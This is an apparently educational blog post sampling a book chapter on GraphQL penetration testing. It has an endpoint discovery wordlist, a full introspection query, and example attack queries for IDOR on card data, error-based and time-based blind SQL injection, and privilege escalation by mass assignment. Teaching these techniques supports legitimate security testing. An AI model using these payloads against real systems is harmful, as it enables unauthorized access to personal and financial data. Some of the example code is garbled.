AlbusSec:- Penetration-List 13 GraphQL Vulnerabilities — Sample

Hi Information Security folk, I hope you liked my previous article that was on Application Programming Interface(API) Vulnerabilities. However, Today We’ll learn about how many vulnerabilities were found in a very popular query language called Graphql. As We knew whenever new technology was found then new vulnerabilities were also arising. So before we start, I will introduce myself. So, I’m Aniket Tyagi, an Information Technology officer at the 5f eco foundation of India, an Information Security Researcher and the founder of Albus Security. Without wasting our energy, Let’s get started.

Introduction to GraphQL:-

It is a data query language (DQL) and data manipulation language that is open source (DML). One of its benefits is that it offers a more efficient and powerful alternative to others like REST. It’s worth noting that GraphQL isn’t attached to any particular database or storage engine for that matter, but rather relies on existing code. This means that, unlike REST APIs where the client first interacts with arbitrary code written by the programmer, the client first interacts with GraphQL, which then interacts with arbitrary code before finally talking to the database. GraphQl makes life easy for applications because Whenever an application will use GraphQL language then you don’t have to send multiple requests to the API, a single request can be used to gather all the information.

GraphQL

Now let’s talk about vulnerabilities that were found on GraphQL. However, GraphQL by default does not implement authentication, which means it’s available to everyone and anyone can send a query. And might be a malicious activity that will access sensitive information. We know, it’s a new query language, therefore it’s will give advantages to an attacker such as Information Disclosure (PII Leaks), Insecure Direct Object References(IDOR), and Broken Access Control which can be exploited on GraphQL endpoint

raphiql.css
graphiql/finland
graphiql.js
graphiql.min.css
graphiql.min.js
graphiql.php
graphqlgraphql/console
graphql-explorer
graphql.php
graphql/schema.json
graphql/schema.xml
graphql/schema.yaml
graphql
v1/graphql
v1/explorer
v1/graphiql
v1/graphiql.css
v1/graphiql/finland
v1/graphiql.js
v1/graphiql.min.css
v1/graphiql.min.js
v1/graphiql.php
v1/graphql
v1/graphql/console
v1/graphql-explorer
v1/graphql.php
v1/graphql/schema.json
v1/graphql/schema.xml
v1/graphql/schema.yaml
v1/playground
v1/subscriptions

Whenever You’ll access the graphQL endpoints, then start with introspection. Introspection is the mechanism to ask the Graph for resources that are available in the current API schema is known as introspection. because the Introspection of the API reveals the queries, types, fields, and directives it supports.

Introspection-1

If You want to learn more about Introspection, then visit GraphQL Online Learn, therefore You’ll use this query for the whole introspection to your target.

{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}C}}}}

Contribute:- Yeswehack

Sometimes an application will disable the introspection for Security Purposes. Without wasting time, start investigating what they don’t want us to see. One of the features of GraphQL for queries is to suggest fields and operations if the user enters the Wrong Query. For Example:- If you try to query a field but make a typo. GraphQL will try to suggest a field that is similar to the one you were trying to query.

{Suggestion-Feature-PHOTO}

Also, If an application is a disabled Introspection, You can use this tool to extract Graphql options

Another thing to keep in mind is that sometime an application will allow certain HTTP requests ( GET | POST | HEAD | OPTIONS etc). therefore If you get Forbidden or Not allowed, then try to change the request methods.

#1 Vulnerability: Improper Query Implement:-

In the introspection, you can find some of the objects in which you can directly query. In the following image, You can see that the “card number” takes the parameter “userid”. therefore this request will return a piece of information about the particular user from the listed bank

query {   
Cardnumebr(userid: 1337){    
   CVE
   name
  } 
}

Suppose An application only checks the userid parameter for further process, then any malicious activity will change that value and get details about the registered account card number.

query {   
Cardnumebr(userid: 1){    
   CVE
   name
  } 
}

However, Query flaw is just like Insecure-Direct-Object-Reference(IDOR).

#2 Vulnerability: SQL-Injection:-

As I previously demonstrated, GraphQL interacts with arbitrary code written by the programmers. Because GraphQL does not protect against all types of attacks on its own, therefore an application can’t be protected by any measurer, then there is a high chance that the application may be vulnerable SQL-Injection. first if don’t know about SQLI, then learn about SQL-Injection. However, Suppose You have a Mutation called email which is used to update an email. therefore an application is vulnerable to SQLi so if you try to generate an error, then try to give an odd value to the database.

mutation {
    registerAccount(nickname:"hacker ' order by 1,2,3,4 #"){
        user {
           email
           nickname
           role
           } 
       }
}

Same If a server is not vulnerable to Union-Based or Error-Based-SQLi, then you should try Blind-SQI.

mutation {
    registerAccount(nickname:"hacker ') and if(substr(database(),1,1)="s",sleep(3),null #"){
        user {
           email
           nickname
           role
           } 
       }
}

Also, You can use automation with the help of SQLimap.

#3 Vulnerability: Information Disclosure:-

Sometimes an application work with debug mode, therefore if you try to generate an error on graphql, then there is a high chance to get some juicy information about an application. for this, You need to add some unwanted value to an object, or parameter.

#4 Vulnerability: Improper Access Control:-

Whenever an application wants to perform, change actions on data, then it’ll send a mutation query. Therefore it also contains some problems that are similar to Mass assignment Vulnerability. Suppose an application has a mutation called “delete account”, that has some fields like accounting, and state. And You can see another field after sending a mutation roletherefore You add the role field into Mutation, then modify that role value from userto adminthen you have access to delete any account with admin access. However, GraphQL is difficult for developers to manage all things perfectly.

mutation {
    Deleteaccount(nickname:"hacker", role: "Admin"){
        user {
           email
           nickname
           role
           } 
       }
}

Finally, We’ve Completed Our “GraphQL Vulnerabilities” Sample Article. However As usual here is an Update for Everyone, I’ll upload topics as a sample on medium, not a proper section because I’ve started to make a book. That’s why I’ll not upload the whole thing on medium. Now Upcoming writeups will be uploaded as a sample. Thank You For Reading

You can download a sample of the book:

Penetration-list-Sample